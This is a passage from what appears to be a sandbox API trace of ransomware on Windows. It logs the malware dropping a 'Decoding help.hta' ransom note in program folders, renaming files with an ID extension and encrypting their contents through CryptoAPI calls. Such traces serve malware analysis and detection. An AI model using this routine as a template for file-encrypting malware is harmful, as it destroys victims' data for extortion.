Shared\\Source Engine\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\decoding help.hta")) returned 0xffffffff [0043.859] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x444 [0043.859] WriteFile (in: hFile=0x444, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1895fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1895fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0043.860] CloseHandle (hObject=0x444) returned 1 [0043.860] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0043.860] lstrcmpiW (lpString1="Decoding help.hta", lpString2="OSE.EXE") returned -1 [0043.860] lstrlenW (lpString="OSE.EXE") returned 7 [0043.860] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\*.*" [0043.860] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\*.*") returned 68 [0043.860] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\", lpString2="OSE.EXE" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE" [0043.861] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE" [0043.861] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE.[ID]g9uZrLhJaygpwRm1[ID]" [0043.861] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.861] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x444 [0043.861] CreateFileMappingA (hFile=0x444, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x438 [0043.861] CryptAcquireContextA (in: phProv=0x1895fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1895fcec*=0x3449d70) returned 1 [0043.862] CryptGenKey (in: hProv=0x3449d70, Algid=0x6610, dwFlags=0x1, phKey=0x1895fce8 | out: phKey=0x1895fce8*=0x5da538) returned 1 [0043.862] CryptExportKey (in: hKey=0x5da538, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1895fbe4, pdwDataLen=0x1895fce4 | out: pbData=0x1895fbe4*, pdwDataLen=0x1895fce4*=0x2c) returned 1 [0043.862] MapViewOfFile (hFileMappingObject=0x438, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2a960) returned 0x3a60000 [0045.652] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1895fbe4*, pdwDataLen=0x1895fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1895fbe4*, pdwDataLen=0x1895fcf8*=0x100) returned 1 [0048.858] CryptEncrypt (in: hKey=0x5da538, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a60000, pdwDataLen=0x1895fce4*=0x2a960, dwBufLen=0x2a960 | out: pbData=0x3a60000*, pdwDataLen=0x1895fce4*=0x2a960) returned 1 [0048.877] UnmapViewOfFile (lpBaseAddress=0x3a60000) returned 1 [0048.880] CloseHandle (hObject=0x438) returned 1 [0048.881] CryptDestroyKey (hKey=0x5da538) returned 1 [0048.881] CryptReleaseContext (hProv=0x3449d70, dwFlags=0x0) returned 1 [0048.881] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.881] WriteFile (in: hFile=0x444, lpBuffer=0x1895fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x1895fcf8, lpOverlapped=0x0 | out: lpBuffer=0x1895fbe4*, lpNumberOfBytesWritten=0x1895fcf8*=0x100, lpOverlapped=0x0) returned 1 [0050.926] WriteFile (in: hFile=0x444, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x1895fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x1895fcf8*=0x500, lpOverlapped=0x0) returned 1 [0050.926] CloseHandle (hObject=0x444) returned 1 [0051.648] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0055.290] FindNextFileW (in: hFindFile=0x5da4f8, lpFindFileData=0x1895fd30 | out: lpFindFileData=0x1895fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfcedc00, ftCreationTime.dwHighDateTime=0x1ca911d, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xcfcedc00, ftLastWriteTime.dwHighDateTime=0x1ca911d, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0x0, dwReserved1=0x0, cFileName="OSE.EXE", cAlternateFileName="")) returned 0 [0055.290] FindClose (in: hFindFile=0x5da4f8 | out: hFindFile=0x5da4f8) returned 1 Thread: id = 386 os_tid = 0xabc [0043.862] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\*.*", lpFindFileData=0x18a9fd30 | out: lpFindFileData=0x18a9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da5f8 [0043.864] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.864] FindNextFileW (in: hFindFile=0x5da5f8, lpFindFileData=0x18a9fd30 | out: lpFindFileData=0x18a9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.864] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.864] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.864] FindNextFileW (in: hFindFile=0x5da5f8, lpFindFileData=0x18a9fd30 | out: lpFindFileData=0x18a9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TTS20", cAlternateFileName="")) returned 1 [0043.864] lstrcmpW (lpString1=".", lpString2="TTS20") returned -1 [0043.864] lstrcmpW (lpString1="..", lpString2="TTS20") returned -1 [0043.864] lstrcmpiW (lpString1="windows", lpString2="TTS20") returned 1 [0044.204] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\*.*" [0044.204] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\*.*") returned 61 [0044.204] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\", lpString2="TTS20" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20" [0044.204] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" [0044.204] GlobalMemoryStatus (in: lpBuffer=0x18a9fd10 | out: lpBuffer=0x18a9fd10) [0044.204] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10f6f448, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x708 [0044.233] CloseHandle (hObject=0x708) returned 1 [0044.233] FindNextFileW (in: hFindFile=0x5da5f8, lpFindFileData=0x18a9fd30 | out: lpFindFileData=0x18a9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd85ef28, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd85ef28, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TTS20", cAlternateFileName="")) returned 0 [0044.233] FindClose (in: hFindFile=0x5da5f8 | out: hFindFile=0x5da5f8) returned 1 Thread: id = 387 os_tid = 0xab0 [0043.864] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*", lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e177d26, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e177d26, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5da7f8 [0044.443] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.443] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd85ef28, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e177d26, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e177d26, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0044.520] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.520] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.520] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2608de, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2608de, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xcdfff30e, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xff, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bears.htm", cAlternateFileName="")) returned 1 [0044.520] lstrcpyW (in: lpString1=0x110a78d0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.520] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.520] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0044.520] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0xffffffff [0044.520] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0044.521] WriteFile (in: hFile=0x354, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x18bdfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x18bdfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0044.525] CloseHandle (hObject=0x354) returned 1 [0044.525] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0044.525] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Bears.htm") returned 1 [0044.525] lstrlenW (lpString="Bears.htm") returned 9 [0044.525] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.525] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.525] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Bears.htm" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm" [0044.525] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm" [0044.525] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm.[ID]g9uZrLhJaygpwRm1[ID]" [0044.526] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.564] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce2acb98, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce2acb98, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa352261, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x432, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bears.jpg", cAlternateFileName="")) returned 1 [0044.564] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.564] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.564] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0044.564] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0044.565] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Bears.jpg") returned 1 [0044.565] lstrlenW (lpString="Bears.jpg") returned 9 [0044.565] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.565] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.565] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Bears.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg" [0044.565] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg" [0044.565] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0044.565] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.565] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4ca9e3b, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4ca9e3b, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x4421c165, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xa0f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Blue_Gradient.jpg", cAlternateFileName="")) returned 1 [0044.565] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.565] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.565] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0044.565] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0044.565] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Blue_Gradient.jpg") returned 1 [0044.565] lstrlenW (lpString="Blue_Gradient.jpg") returned 17 [0044.565] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.565] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.565] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Blue_Gradient.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" [0044.565] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" [0044.565] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0044.565] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Blue_Gradient.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\blue_gradient.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.566] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4ccff98, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4ccff98, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x442422c3, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x11eb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cave_Drawings.gif", cAlternateFileName="")) returned 1 [0044.566] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.566] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.566] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0044.566] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0044.566] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Cave_Drawings.gif") returned 1 [0044.566] lstrlenW (lpString="Cave_Drawings.gif") returned 17 [0044.566] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.566] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.566] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Cave_Drawings.gif" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif" [0044.566] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif" | out: 